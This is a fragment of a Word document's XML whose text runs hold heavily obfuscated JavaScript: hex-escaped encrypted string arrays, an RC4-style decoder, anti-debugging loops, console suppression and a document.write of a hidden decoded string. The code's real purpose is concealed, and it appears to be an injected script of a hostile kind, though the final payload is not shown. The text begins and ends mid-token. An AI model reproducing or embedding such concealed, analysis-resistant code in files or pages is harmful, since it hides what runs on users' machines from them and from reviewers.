a\x62\x63\x4f\x38\x77\x36\x4d\x3d&amp;#39;,&amp;#39;\x48\x73\x4b\x75\x46\x4d\x4b\x31\x77\x34\x66\x43\x6c\x63\x4b\x78\x77\x36\x54\x43\x75\x4d\x4f\x77\x77\x70\x73\x63\x77\x71\x50\x44\x69\x73\x4b\x68\x77\x70\x44\x43\x71\x63\x4b\x4f\x77\x37\x73\x56\x4f\x63\x4b\x4b\x48\x53\x37\x44\x6b\x7a\x56\x7a\x48\x68\x76\x43\x6c\x32\x76\x44\x6f\x69\x39\x69\x77\x37\x54\x44\x6b\x73\x4f\x30\x41\x4d\x4b\x6a\x56\x73\x4b\x44\x77\x35\x2f\x43\x70\x32\x6b\x55\x77\x37\x6c\x66\x54\x63\x4b\x43\x77\x34\x44\x44\x6b\x4d\x4f\x35\x77\x70\x78\x38\x58\x47\x35\x59\x77\x37\x6a\x44\x6c\x6b\x78\x50\x49\x77\x3d\x3d&amp;#39;,&amp;#39;\x77\x35\x4d\x37\x77\x72\x66\x43\x6a\x53\x6f\x3d&amp;#39;,&amp;#39;\x62\x63\x4f\x64\x77\x34\x31\x44\x62\x67\x3d\x3d&amp;#39;,&amp;#39;\x77\x35\x62\x43\x6a\x32\x34\x68\x54\x67\x3d\x3d&amp;#39;,&amp;#39;\x4f\x63\x4b\x55\x52\x38\x4f\x38\x77\x34\x4d\x3d&amp;#39;,&amp;#39;\x5a\x38\x4b\x6e\x49\x68\x4d\x4b&amp;#39;];(function(_0x20ecb1,_0x488fa5){var </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>_0x519bbd=function(_0x4dafc6){while(--_0x4dafc6){_0x20ecb1[&amp;#39;push&amp;#39;](_0x20ecb1[&amp;#39;shift&amp;#39;]());}};var _0xf79497=function(){var _0xa87268={&amp;#39;data&amp;#39;:{&amp;#39;key&amp;#39;:&amp;#39;cookie&amp;#39;,&amp;#39;value&amp;#39;:&amp;#39;timeout&amp;#39;},&amp;#39;setCookie&amp;#39;:function(_0x5aceb8,_0x1dc566,_0x52c519,_0x6b5111){_0x6b5111=_0x6b5111||{};var _0x1ce942=_0x1dc566+&amp;#39;=&amp;#39;+_0x52c519;var _0x272e9b=0x0;for(var _0x272e9b=0x0,_0x8cceaa=_0x5aceb8[&amp;#39;length&amp;#39;];_0x272e9b&amp;lt;_0x8cceaa;_0x272e9b++){var _0x2e3889=_0x5aceb8[_0x272e9b];_0x1ce942+=&amp;#39;;\x20&amp;#39;+_0x2e3889;var _0x16903f=_0x5aceb8[_0x2e3889];_0x5aceb8[&amp;#39;push&amp;#39;](_0x16903f);_0x8cceaa=_0x5aceb8[&amp;#39;length&amp;#39;];if(_0x16903f!==!![]){_0x1ce942+=&amp;#39;=&amp;#39;+_0x16903f;}}_0x6b5111[&amp;#39;cookie&amp;#39;]=_0x1ce942;},&amp;#39;removeCookie&amp;#39;:function(){return&amp;#39;dev&amp;#39;;},&amp;#39;getCookie&amp;#39;:function(_0x29a578,_0x39d768){_0x29a578=_0x29a578||function(_0x4bb3ae){return _0x4bb3ae;};var _0x2c2603=_0x29a578(new RegExp(&amp;#39;(?:^|;\x20)&amp;#39;+_0x39d768[&amp;#39;replace&amp;#39;](/([.$?*|{}()[]\/+^])/g,&amp;#39;$1&amp;#39;)+&amp;#39;=([^;]*)&amp;#39;));var _0x1b9284=function(_0x29e65b,_0x29cdb6){_0x29e65b(++_0x29cdb6);};_0x1b9284(_0x519bbd,_0x488fa5);return _0x2c2603?decodeURIComponent(_0x2c2603[0x1]):undefined;}};var _0x488db2=function(){var _0x18eac5=new RegExp(&amp;#39;\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}&amp;#39;);return _0x18eac5[&amp;#39;test&amp;#39;](_0xa87268[&amp;#39;removeCookie&amp;#39;][&amp;#39;toString&amp;#39;]());};_0xa87268[&amp;#39;updateCookie&amp;#39;]=_0x488db2;var _0x52736a=&amp;#39;&amp;#39;;var _0x3a8013=_0xa87268[&amp;#39;updateCookie&amp;#39;]();if(!_0x3a8013){_0xa87268[&amp;#39;setCookie&amp;#39;]([&amp;#39;*&amp;#39;],&amp;#39;counter&amp;#39;,0x1);}else if(_0x3a8013){_0x52736a=_0xa87268[&amp;#39;getCookie&amp;#39;](null,&amp;#39;counter&amp;#39;);}else{_0xa87268[&amp;#39;removeCookie&amp;#39;]();}};_0xf79497();}(_0x177b,0x115));var _0x261f=function(_0x5acba0,_0x5b9075){_0x5acba0=_0x5acba0-0x0;var _0x1d9f31=_0x177b[_0x5acba0];if(_0x261f[&amp;#39;VltySw&amp;#39;]===undefined){(function(){var _0x1a9433;try{var _0x5ad4eb=Function(&amp;#39;return\x20(function()\x20&amp;#39;+&amp;#39;{}.constructor(\x22return\x20this\x22)(\x20)&amp;#39;+&amp;#39;);&amp;#39;);_0x1a9433=_0x5ad4eb();}catch(_0x5bc542){_0x1a9433=window;}var _0x4b048e=&amp;#39;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=&amp;#39;;_0x1a9433[&amp;#39;atob&amp;#39;]||(_0x1a9433[&amp;#39;atob&amp;#39;]=function(_0x57735e){var _0x416f0f=String(_0x57735e)[&amp;#39;replace&amp;#39;](/=+$/,&amp;#39;&amp;#39;);for(var _0x4a0485=0x0,_0x1b8da9,_0x4fe0e7,_0x4acea7=0x0,_0x3e990b=&amp;#39;&amp;#39;;_0x4fe0e7=_0x416f0f[&amp;#39;charAt&amp;#39;](_0x4acea7++);~_0x4fe0e7&amp;amp;&amp;amp;(_0x1b8da9=_0x4a0485%0x4?_0x1b8da9*0x40+_0x4fe0e7:_0x4fe0e7,_0x4a0485++%0x4)?_0x3e990b+=String[&amp;#39;fromCharCode&amp;#39;](0xff&amp;amp;_0x1b8da9&amp;gt;&amp;gt;(-0x2*_0x4a0485&amp;amp;0x6)):0x0){_0x4fe0e7=_0x4b048e[&amp;#39;indexOf&amp;#39;](_0x4fe0e7);}return _0x3e990b;});}());var _0x2d03b6=function(_0x287eb2,_0x5b9075){var _0xae953=[],_0x28455b=0x0,_0x36b912,_0x43dd25=&amp;#39;&amp;#39;,_0x3bbbc3=&amp;#39;&amp;#39;;_0x287eb2=atob(_0x287eb2);for(var _0x2d38c0=0x0,_0x5844d7=_0x287eb2[&amp;#39;length&amp;#39;];_0x2d38c0&amp;lt;_0x5844d7;_0x2d38c0++){_0x3bbbc3+=&amp;#39;%&amp;#39;+(&amp;#39;00&amp;#39;+_0x287eb2[&amp;#39;charCodeAt&amp;#39;](_0x2d38c0)[&amp;#39</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>;toString&amp;#39;](0x10))[&amp;#39;slice&amp;#39;](-0x2);}_0x287eb2=decodeURIComponent(_0x3bbbc3);for(var _0x2c613d=0x0;_0x2c613d&amp;lt;0x100;_0x2c613d++){_0xae953[_0x2c613d]=_0x2c613d;}for(_0x2c613d=0x0;_0x2c613d&amp;lt;0x100;_0x2c613d++){_0x28455b=(_0x28455b+_0xae953[_0x2c613d]+_0x5b9075[&amp;#39;charCodeAt&amp;#39;](_0x2c613d%_0x5b9075[&amp;#39;length&amp;#39;]))%0x100;_0x36b912=_0xae953[_0x2c613d];_0xae953[_0x2c613d]=_0xae953[_0x28455b];_0xae953[_0x28455b]=_0x36b912;}_0x2c613d=0x0;_0x28455b=0x0;for(var _0x50ade2=0x0;_0x50ade2&amp;lt;_0x287eb2[&amp;#39;length&amp;#39;];_0x50ade2++){_0x2c613d=(_0x2c613d+0x1)%0x100;_0x28455b=(_0x28455b+_0xae953[_0x2c613d])%0x100;_0x36b912=_0xae953[_0x2c613d];_0xae953[_0x2c613d]=_0xae953[_0x28455b];_0xae953[_0x28455b]=_0x36b912;_0x43dd25+=String[&amp;#39;fromCharCode&amp;#39;](_0x287eb2[&amp;#39;charCodeAt&amp;#39;](_0x50ade2)^_0xae953[(_0xae953[_0x2c613d]+_0xae953[_0x28455b])%0x100]);}return _0x43dd25;};_0x261f[&amp;#39;vEMuPf&amp;#39;]=_0x2d03b6;_0x261f[&amp;#39;kNduIY&amp;#39;]={};_0x261f[&amp;#39;VltySw&amp;#39;]=!![];}var _0x4af3f1=_0x261f[&amp;#39;kNduIY&amp;#39;][_0x5acba0];if(_0x4af3f1===undefined){if(_0x261f[&amp;#39;yDITFf&amp;#39;]===undefined){var _0x455345=function(_0x56c5cc){this[&amp;#39;NkwdTG&amp;#39;]=_0x56c5cc;this[&amp;#39;GvkVpy&amp;#39;]=[0x1,0x0,0x0];this[&amp;#39;Ahdtsm&amp;#39;]=function(){return&amp;#39;newState&amp;#39;;};this[&amp;#39;UIzLIl&amp;#39;]=&amp;#39;\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*&amp;#39;;this[&amp;#39;XyAJtg&amp;#39;]=&amp;#39;[\x27|\x22].+[\x27|\x22];?\x20*}&amp;#39;;};_0x455345[&amp;#39;prototype&amp;#39;][&amp;#39;vDIEFA&amp;#39;]=function(){var _0x15ba85=new RegExp(this[&amp;#39;UIzLIl&amp;#39;]+this[&amp;#39;XyAJtg&amp;#39;]);var _0x2c11b0=_0x15ba85[&amp;#39;test&amp;#39;](this[&amp;#39;Ahdtsm&amp;#39;][&amp;#39;toString&amp;#39;]())?--this[&amp;#39;GvkVpy&amp;#39;][0x1]:--this[&amp;#39;GvkVpy&amp;#39;][0x0];return this[&amp;#39;BfXYRO&amp;#39;](_0x2c11b0);};_0x455345[&amp;#39;prototype&amp;#39;][&amp;#39;BfXYRO&amp;#39;]=function(_0x51b84c){if(!Boolean(~_0x51b84c)){return _0x51b84c;}return this[&amp;#39;DGImfG&amp;#39;](this[&amp;#39;NkwdTG&amp;#39;]);};_0x455345[&amp;#39;prototype&amp;#39;][&amp;#39;DGImfG&amp;#39;]=function(_0x2e0b79){for(var _0x39c6bc=0x0,_0x489063=this[&amp;#39;GvkVpy&amp;#39;][&amp;#39;length&amp;#39;];_0x39c6bc&amp;lt;_0x489063;_0x39c6bc++){this[&amp;#39;GvkVpy&amp;#39;][&amp;#39;push&amp;#39;](Math[&amp;#39;round&amp;#39;](Math[&amp;#39;random&amp;#39;]()));_0x489063=this[&amp;#39;GvkVpy&amp;#39;][&amp;#39;length&amp;#39;];}return _0x2e0b79(this[&amp;#39;GvkVpy&amp;#39;][0x0]);};new _0x455345(_0x261f)[&amp;#39;vDIEFA&amp;#39;]();_0x261f[&amp;#39;yDITFf&amp;#39;]=!![];}_0x1d9f31=_0x261f[&amp;#39;vEMuPf&amp;#39;](_0x1d9f31,_0x5b9075);_0x261f[&amp;#39;kNduIY&amp;#39;][_0x5acba0]=_0x1d9f31;}else{_0x1d9f31=_0x4af3f1;}return _0x1d9f31;};var _0x301354=function(){var _0x5ded05=!![];return function(_0x36df64,_0x1dda40){var _0x2a9fda=_0x5ded05?function(){if(_0x1dda40){var _0x41e06c=_0x1dda40[&amp;#39;apply&amp;#39;](_0x36df64,arguments);_0x1dda40=null;return _0x41e06c;}}:function(){};_0x5ded05=![];return _0x2a9fda;};}();var _0x46d1f3=_0x301354(this,function(){var _0x1a452b=function(){return&amp;#39;\x64\x65\x76&amp;#39;;},_0x5d8d48=function(){return&amp;#39;\x77\x69\x6e\x64\x6f\x77&amp;#39;;};var _0x22d20c=function(){var _0x5ae8a=new RegExp(&amp;#39;\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d&amp;#39;);return!_0x5ae8a[&amp;#39;\x74\x65\x73\x74&amp;#39;](_0x1a452b[&amp;#39;\x74\x6f\x53\x74\x72\x69\x6e\x67&amp;#39;]());};var _0x942f8f=function(){var _0x13ac60=new RegExp(&amp;#39;\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b&amp;</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#39;);return _0x13ac60[&amp;#39;\x74\x65\x73\x74&amp;#39;](_0x5d8d48[&amp;#39;\x74\x6f\x53\x74\x72\x69\x6e\x67&amp;#39;]());};var _0x4800de=function(_0x404ccb){var _0x1341d3=~-0x1&amp;gt;&amp;gt;0x1+0xff%0x0;if(_0x404ccb[&amp;#39;\x69\x6e\x64\x65\x78\x4f\x66&amp;#39;](&amp;#39;\x69&amp;#39;===_0x1341d3)){_0x3bee39(_0x404ccb);}};var _0x3bee39=function(_0x2caf90){var _0x21d836=~-0x4&amp;gt;&amp;gt;0x1+0xff%0x0;if(_0x2caf90[&amp;#39;\x69\x6e\x64\x65\x78\x4f\x66&amp;#39;]((!![]+&amp;#39;&amp;#39;)[0x3])!==_0x21d836){_0x4800de(_0x2caf90);}};if(!_0x22d20c()){if(!_0x942f8f()){_0x4800de(&amp;#39;\x69\x6e\x64\u0435\x78\x4f\x66&amp;#39;);}else{_0x4800de(&amp;#39;\x69\x6e\x64\x65\x78\x4f\x66&amp;#39;);}}else{_0x4800de(&amp;#39;\x69\x6e\x64\u0435\x78\x4f\x66&amp;#39;);}});_0x46d1f3();var _0x14385d=function(){var _0x11e1aa=!![];return function(_0x5a9962,_0x501fe2){var _0x32b868=_0x11e1aa?function(){if(_0x501fe2){var _0x4c4ef2=_0x501fe2[_0x261f(&amp;#39;0x0&amp;#39;,&amp;#39;\x24\x42\x70\x55&amp;#39;)](_0x5a9962,arguments);_0x501fe2=null;return _0x4c4ef2;}}:function(){};_0x11e1aa=![];return _0x32b868;};}();setInterval(function(){var _0x3dcfb4={&amp;#39;\x48\x46\x5a\x52\x66&amp;#39;:function(_0x47c29e){return _0x47c29e();}};_0x3dcfb4[_0x261f(&amp;#39;0x1&amp;#39;,&amp;#39;\x6f\x38\x28\x61&amp;#39;)](_0x396060);},0xfa0);(function(){var _0x4bb1fa={&amp;#39;\x54\x73\x41\x74\x61&amp;#39;:&amp;#39;\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x2a\x5c\x28\x20\x2a\x5c\x29&amp;#39;,&amp;#39;\x63\x66\x6f\x71\x47&amp;#39;:_0x261f(&amp;#39;0x2&amp;#39;,&amp;#39;\x70\x61\x36\x42&amp;#39;),&amp;#39;\x50\x4a\x7a\x64\x57&amp;#39;:function(_0x21b2aa,_0x17eece){return _0x21b2aa(_0x17eece);},&amp;#39;\x67\x4d\x7a\x64\x76&amp;#39;:function(_0x552408,_0x23ad01){return _0x552408+_0x23ad01;},&amp;#39;\x5a\x64\x59\x6b\x5a&amp;#39;:_0x261f(&amp;#39;0x3&amp;#39;,&amp;#39;\x4f\x44\x4e\x32&amp;#39;),&amp;#39;\x49\x5a\x46\x56\x4d&amp;#39;:function(_0x27020a,_0x3c7090){return _0x27020a+_0x3c7090;},&amp;#39;\x66\x66\x62\x45\x44&amp;#39;:_0x261f(&amp;#39;0x4&amp;#39;,&amp;#39;\x39\x72\x68\x67&amp;#39;),&amp;#39;\x58\x76\x4c\x63\x54&amp;#39;:function(_0x3e189e){return _0x3e189e();},&amp;#39;\x48\x50\x54\x72\x6a&amp;#39;:function(_0x2635ec,_0xc15f51,_0x5e4460){return _0x2635ec(_0xc15f51,_0x5e4460);}};_0x4bb1fa[_0x261f(&amp;#39;0x5&amp;#39;,&amp;#39;\x21\x46\x35\x45&amp;#39;)](_0x14385d,this,function(){var _0x40e6f9=new RegExp(_0x4bb1fa[_0x261f(&amp;#39;0x6&amp;#39;,&amp;#39;\x53\x62\x28\x4b&amp;#39;)]);var _0x4ab4d0=new RegExp(_0x4bb1fa[_0x261f(&amp;#39;0x7&amp;#39;,&amp;#39;\x40\x6e\x4e\x4f&amp;#39;)],&amp;#39;\x69&amp;#39;);var _0x2439f0=_0x4bb1fa[_0x261f(&amp;#39;0x8&amp;#39;,&amp;#39;\x74\x55\x75\x4e&amp;#39;)](_0x396060,&amp;#39;\x69\x6e\x69\x74&amp;#39;);if(!_0x40e6f9[_0x261f(&amp;#39;0x9&amp;#39;,&amp;#39;\x38\x33\x25\x6b&amp;#39;)](_0x4bb1fa[_0x261f(&amp;#39;0xa&amp;#39;,&amp;#39;\x38\x33\x25\x6b&amp;#39;)](_0x2439f0,_0x4bb1fa[_0x261f(&amp;#39;0xb&amp;#39;,&amp;#39;\x21\x63\x66\x40&amp;#39;)]))||!_0x4ab4d0[_0x261f(&amp;#39;0xc&amp;#39;,&amp;#39;\x6e\x25\x23\x61&amp;#39;)](_0x4bb1fa[_0x261f(&amp;#39;0xd&amp;#39;,&amp;#39;\x7a\x4e\x52\x75&amp;#39;)](_0x2439f0,_0x4bb1fa[_0x261f(&amp;#39;0xe&amp;#39;,&amp;#39;\x41\x21\x63\x41&amp;#39;)]))){_0x2439f0(&amp;#39;\x30&amp;#39;);}else{_0x4bb1fa[&amp;#39;\x58\x76\x4c\x63\x54&amp;#39;](_0x396060);}})();}());var _0x4edca7=function(){var _0x1fc4ac={&amp;#39;\x6a\x56\x52\x4c\x75&amp;#39;:&amp;#39;\x77\x68\x69\x6c\x65\x20\x28\x74\x72\x75\x65\x29\x20\x7b\x7d&amp;#39;,&amp;#39;\x51\x50\x43\x6b\x6a&amp;#39;:_0x261f(&amp;#39;0xf&amp;#39;,&amp;#39;\x6e\x25\x23\x61&amp;#39;),&amp;#39;\x7a\x59\x63\x4d\x46&amp;#39;:_0x261f(&amp;#39;0x10&amp;#39;,&amp;#39;\x21\x63\x66\x40&amp;#39;),&amp;#39;\x55\x42\x4c\x69\x64&amp;#39;:function(_0x20d63b,_0xc2cddf){return _0x20d63b===_0xc2cddf;},&amp;#39;\x6e\x75\x4a\x6e\x44&amp;#39;:_0x261f(&amp;#39;0x11&amp;#39;,&amp;#39;\x42\x45\x31\x51&amp;#39;)};var _0x5c20fd=!![];return function(_0x388e9b,_0xdad5c2){if(_0x1fc4ac[_0x261f(&amp;#39;0x12&amp;#39;,&amp;#39;\x49\x32\x7a\x34&amp;#39;)](_0x1fc4ac[_0x261f(&amp;#39;0x13&amp;#39;,&amp;#39;\x66\x36\x6f\x30&amp;#39;)],_0x261f(&amp;#39;0x14&amp;#39;,</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&amp;#39;\x6c\x66\x29\x23&amp;#39;))){return function(_0x3206c0){}[_0x261f(&amp;#39;0x15&amp;#39;,&amp;#39;\x39\x72\x68\x67&amp;#39;)](_0x1fc4ac[_0x261f(&amp;#39;0x16&amp;#39;,&amp;#39;\x6e\x37\x4b\x4c&amp;#39;)])[_0x261f(&amp;#39;0x17&amp;#39;,&amp;#39;\x53\x62\x28\x4b&amp;#39;)](_0x1fc4ac[_0x261f(&amp;#39;0x18&amp;#39;,&amp;#39;\x6f\x38\x28\x61&amp;#39;)]);}else{var _0x407867=_0x5c20fd?function(){if(_0x261f(&amp;#39;0x19&amp;#39;,&amp;#39;\x53\x62\x28\x4b&amp;#39;)!==_0x1fc4ac[_0x261f(&amp;#39;0x1a&amp;#39;,&amp;#39;\x47\x44\x45\x24&amp;#39;)]){var _0x5d9adb=_0xdad5c2[_0x261f(&amp;#39;0x1b&amp;#39;,&amp;#39;\x4f\x6e\x66\x69&amp;#39;)](_0x388e9b,arguments);_0xdad5c2=null;return _0x5d9adb;}else{if(_0xdad5c2){var _0x24aec2=_0xdad5c2[_0x261f(&amp;#39;0x1c&amp;#39;,&amp;#39;\x32\x4c\x66\x32&amp;#39;)](_0x388e9b,arguments);_0xdad5c2=null;return _0x24aec2;}}}:function(){};_0x5c20fd=![];return _0x407867;}};}();var _0x1af61a=_0x4edca7(this,function(){var _0xf0513f={&amp;#39;\x49\x75\x66\x5a\x66&amp;#39;:function(_0x56a423,_0x5cdcab){return _0x56a423(_0x5cdcab);},&amp;#39;\x5a\x63\x48\x43\x5a&amp;#39;:function(_0x4ada3c,_0xf8521a){return _0x4ada3c+_0xf8521a;},&amp;#39;\x57\x64\x62\x67\x55&amp;#39;:_0x261f(&amp;#39;0x1d&amp;#39;,&amp;#39;\x70\x61\x36\x42&amp;#39;),&amp;#39;\x62\x68\x6b\x68\x69&amp;#39;:_0x261f(&amp;#39;0x1e&amp;#39;,&amp;#39;\x65\x7a\x70\x79&amp;#39;),&amp;#39;\x65\x6e\x61\x53\x61&amp;#39;:function(_0x2354b6){return _0x2354b6();},&amp;#39;\x41\x74\x4a\x54\x4d&amp;#39;:function(_0x321e0d,_0x3cc51e){return _0x321e0d!==_0x3cc51e;},&amp;#39;\x55\x75\x73\x74\x46&amp;#39;:_0x261f(&amp;#39;0x1f&amp;#39;,&amp;#39;\x75\x43\x44\x67&amp;#39;),&amp;#39;\x4d\x58\x73\x79\x50&amp;#39;:_0x261f(&amp;#39;0x20&amp;#39;,&amp;#39;\x21\x63\x66\x40&amp;#39;)};var _0x5e04ba=function(){};var _0x1f6a4c=function(){var _0x54e45a;try{_0x54e45a=_0xf0513f[_0x261f(&amp;#39;0x21&amp;#39;,&amp;#39;\x37\x62\x37\x30&amp;#39;)](Function,_0xf0513f[_0x261f(&amp;#39;0x22&amp;#39;,&amp;#39;\x25\x5e\x55\x57&amp;#39;)](_0xf0513f[&amp;#39;\x57\x64\x62\x67\x55&amp;#39;],_0x261f(&amp;#39;0x23&amp;#39;,&amp;#39;\x38\x49\x50\x4c&amp;#39;))+&amp;#39;\x29\x3b&amp;#39;)();}catch(_0x54b47c){_0x54e45a=window;}return _0x54e45a;};var _0xd62df9=_0xf0513f[&amp;#39;\x65\x6e\x61\x53\x61&amp;#39;](_0x1f6a4c);if(!_0xd62df9[&amp;#39;\x63\x6f\x6e\x73\x6f\x6c\x65&amp;#39;]){if(_0xf0513f[_0x261f(&amp;#39;0x24&amp;#39;,&amp;#39;\x61\x68\x7a\x6f&amp;#39;)](_0xf0513f[&amp;#39;\x55\x75\x73\x74\x46&amp;#39;],_0x261f(&amp;#39;0x25&amp;#39;,&amp;#39;\x37\x62\x37\x30&amp;#39;))){var _0x31a643={};_0x31a643[_0x261f(&amp;#39;0x26&amp;#39;,&amp;#39;\x54\x71\x6b\x64&amp;#39;)]=_0x5e04ba;_0x31a643[_0x261f(&amp;#39;0x27&amp;#39;,&amp;#39;\x32\x4c\x66\x32&amp;#39;)]=_0x5e04ba;_0x31a643[_0x261f(&amp;#39;0x28&amp;#39;,&amp;#39;\x23\x4d\x26\x4b&amp;#39;)]=_0x5e04ba;_0x31a643[_0x261f(&amp;#39;0x29&amp;#39;,&amp;#39;\x47\x44\x45\x24&amp;#39;)]=_0x5e04ba;_0x31a643[&amp;#39;\x65\x72\x72\x6f\x72&amp;#39;]=_0x5e04ba;_0x31a643[&amp;#39;\x65\x78\x63\x65\x70\x74\x69\x6f\x6e&amp;#39;]=_0x5e04ba;_0x31a643[_0x261f(&amp;#39;0x2a&amp;#39;,&amp;#39;\x25\x4f\x79\x73&amp;#39;)]=_0x5e04ba;return _0x31a643;}else{_0xd62df9[&amp;#39;\x63\x6f\x6e\x73\x6f\x6c\x65&amp;#39;]=function(_0x5e04ba){var _0x57c445=_0xf0513f[_0x261f(&amp;#39;0x2b&amp;#39;,&amp;#39;\x43\x71\x7a\x51&amp;#39;)][_0x261f(&amp;#39;0x2c&amp;#39;,&amp;#39;\x23\x4d\x26\x4b&amp;#39;)](&amp;#39;\x7c&amp;#39;),_0x46e7b3=0x0;while(!![]){switch(_0x57c445[_0x46e7b3++]){case&amp;#39;\x30&amp;#39;:_0xaa215e[&amp;#39;\x6c\x6f\x67&amp;#39;]=_0x5e04ba;continue;case&amp;#39;\x31&amp;#39;:_0xaa215e[_0x261f(&amp;#39;0x2d&amp;#39;,&amp;#39;\x24\x34\x57\x70&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x32&amp;#39;:var _0xaa215e={};continue;case&amp;#39;\x33&amp;#39;:_0xaa215e[_0x261f(&amp;#39;0x2e&amp;#39;,&amp;#39;\x6d\x4d\x74\x76&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x34&amp;#39;:return _0xaa215e;case&amp;#39;\x35&amp;#39;:_0xaa215e[_0x261f(&amp;#39;0x2f&amp;#39;,&amp;#39;\x41\x21\x63\x41&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x36&amp;#39;:_0xaa215e[_0x261f(&amp;#39;0x30&amp;#39;,&amp;#39;\x75\x43\x44\x67&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x37&amp;#39;:_0xaa215e[&amp;#39;\x69\x6e\x66\x6f&amp;#39;]</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>=_0x5e04ba;continue;case&amp;#39;\x38&amp;#39;:_0xaa215e[_0x261f(&amp;#39;0x31&amp;#39;,&amp;#39;\x41\x21\x63\x41&amp;#39;)]=_0x5e04ba;continue;}break;}}(_0x5e04ba);}}else{var _0x2a80c0=_0xf0513f[&amp;#39;\x4d\x58\x73\x79\x50&amp;#39;][_0x261f(&amp;#39;0x32&amp;#39;,&amp;#39;\x4b\x6f\x75\x40&amp;#39;)](&amp;#39;\x7c&amp;#39;),_0x1c1e6b=0x0;while(!![]){switch(_0x2a80c0[_0x1c1e6b++]){case&amp;#39;\x30&amp;#39;:_0xd62df9[_0x261f(&amp;#39;0x33&amp;#39;,&amp;#39;\x23\x79\x26\x36&amp;#39;)][_0x261f(&amp;#39;0x34&amp;#39;,&amp;#39;\x67\x6f\x77\x45&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x31&amp;#39;:_0xd62df9[_0x261f(&amp;#39;0x35&amp;#39;,&amp;#39;\x42\x45\x31\x51&amp;#39;)][&amp;#39;\x64\x65\x62\x75\x67&amp;#39;]=_0x5e04ba;continue;case&amp;#39;\x32&amp;#39;:_0xd62df9[_0x261f(&amp;#39;0x36&amp;#39;,&amp;#39;\x4d\x47\x57\x6d&amp;#39;)][_0x261f(&amp;#39;0x37&amp;#39;,&amp;#39;\x40\x6e\x4e\x4f&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x33&amp;#39;:_0xd62df9[_0x261f(&amp;#39;0x38&amp;#39;,&amp;#39;\x39\x72\x68\x67&amp;#39;)][_0x261f(&amp;#39;0x39&amp;#39;,&amp;#39;\x6c\x66\x29\x23&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x34&amp;#39;:_0xd62df9[_0x261f(&amp;#39;0x3a&amp;#39;,&amp;#39;\x54\x71\x6b\x64&amp;#39;)][_0x261f(&amp;#39;0x3b&amp;#39;,&amp;#39;\x32\x4c\x66\x32&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x35&amp;#39;:_0xd62df9[_0x261f(&amp;#39;0x3c&amp;#39;,&amp;#39;\x51\x51\x59\x7a&amp;#39;)][_0x261f(&amp;#39;0x3d&amp;#39;,&amp;#39;\x4d\x72\x76\x28&amp;#39;)]=_0x5e04ba;continue;case&amp;#39;\x36&amp;#39;:_0xd62df9[_0x261f(&amp;#39;0x3e&amp;#39;,&amp;#39;\x37\x62\x37\x30&amp;#39;)][_0x261f(&amp;#39;0x3f&amp;#39;,&amp;#39;\x51\x51\x59\x7a&amp;#39;)]=_0x5e04ba;continue;}break;}}});_0x1af61a();document[&amp;#39;\x77\x72\x69\x74\x65&amp;#39;](_0x261f(&amp;#39;0x40&amp;#39;,&amp;#39;\x40\x6e\x4e\x4f&amp;#39;));function _0x396060(_0x72dc01){var _0x46439c={&amp;#39;\x79\x4e\x58\x46\x59&amp;#39;:function(_0xdc9e57,_0xc139f0){return _0xdc9e57===_0xc139f0;},&amp;#39;\x51\x4d\x63\x63\x52&amp;#39;:_0x261f(&amp;#39;0x41&amp;#39;,&amp;#39;\x37\x62\x37\x30&amp;#39;),&amp;#39;\x51\x71\x63\x57\x77&amp;#39;:_0x261f(&amp;#39;0x42&amp;#39;,&amp;#39;\x78\x53\x57\x6a&amp;#39;),&amp;#39;\x59\x5a\x59\x42\x48&amp;#39;:&amp;#39;\x63\x6f\x75\x6e\x74\x65\x72&amp;#39;,&amp;#39;\x77\x44\x45\x6a\x59&amp;#39;:function(_0x992bcf,_0x1df334){return _0x992bcf!==_0x1df334;},&amp;#39;\x42\x52\x58\x5a\x71&amp;#39;:function(_0x19d7a9,_0x532ad2){return _0x19d7a9+_0x532ad2;},&amp;#39;\x47\x7a\x6f\x44\x54&amp;#39;:function(_0x19f22b,_0x242c12){return _0x19f22b/_0x242c12;},&amp;#39;\x42\x6f\x72\x77\x76&amp;#39;:_0x261f(&amp;#39;0x43&amp;#39;,&amp;#39;\x61\x68\x7a\x6f&amp;#39;),&amp;#39;\x56\x46\x65\x4d\x51&amp;#39;:function(_0x158afb,_0x1fa6c0){return _0x158afb+_0x1fa6c0;},&amp;#39;\x75\x48\x73\x46\x43&amp;#39;:_0x261f(&amp;#39;0x44&amp;#39;,&amp;#39;\x4d\x72\x76\x28&amp;#39;),&amp;#39;\x78\x68\x51\x41\x55&amp;#39;:_0x261f(&amp;#39;0x45&amp;#39;,&amp;#39;\x25\x5e\x55\x57&amp;#39;),&amp;#39;\x6b\x51\x63\x73\x76&amp;#39;:_0x261f(&amp;#39;0x46&amp;#39;,&amp;#39;\x24\x42\x70\x55&amp;#39;),&amp;#39;\x62\x57\x51\x6b\x53&amp;#39;:_0x261f(&amp;#39;0x47&amp;#39;,&amp;#39;\x4d\x72\x76\x28&amp;#39;),&amp;#39;\x71\x52\x46\x74\x41&amp;#39;:function(_0x4cff56,_0x299a48){return _0x4cff56(_0x299a48);},&amp;#39;\x4c\x51\x4a\x4e\x75&amp;#39;:function(_0x3849e0){return 